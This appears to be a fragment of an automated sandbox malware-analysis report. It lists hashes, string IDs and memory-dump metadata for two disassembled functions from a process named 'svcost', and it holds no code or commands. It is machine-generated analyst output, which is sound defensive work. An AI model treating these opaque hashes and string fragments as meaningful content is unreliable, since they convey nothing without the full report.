                                                                                                • String ID: +$1$K$`Xh
                                                                                                • API String ID: 0-1880566173
                                                                                                • Opcode ID: ce2908c137b7699983892ee30430b821aa5e1924150fe9f3682a467e81b1c938
                                                                                                • Instruction ID: 3bee1bdfcd7d0236635d61ba11e41cfd7313083458976c6c7970c95149eb8761
                                                                                                • Opcode Fuzzy Hash: ce2908c137b7699983892ee30430b821aa5e1924150fe9f3682a467e81b1c938
                                                                                                • Instruction Fuzzy Hash: AB11D274A04219CFDB21DF69C988B9DBBF0BB4A310F1401A9D449A7354CB749A85CF02
                                                                                                Function 00C487B7 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: O$a$d$c:
                                                                                                • API String ID: 0-397323173
                                                                                                • Opcode ID: fd1c63f727f29cf7824728523c568ae531e3752945d0518b8eaaaadb07ec680a
                                                                                                • Instruction ID: be376c1fa8d589c952d8fb67d7df089831a6b7d87cca2f0527368f19e8ee3071
                                                                                                • Opcode Fuzzy Hash: fd1c63f727f29cf7824728523c568ae531e3752945d0518b8eaaaadb07ec680a
                                                                                                • Instruction Fuzzy Hash: 58F0F8B8904358CFDF208F54C98479DBAB0BB1B311F2811A5C54977294CBB48AC99F1B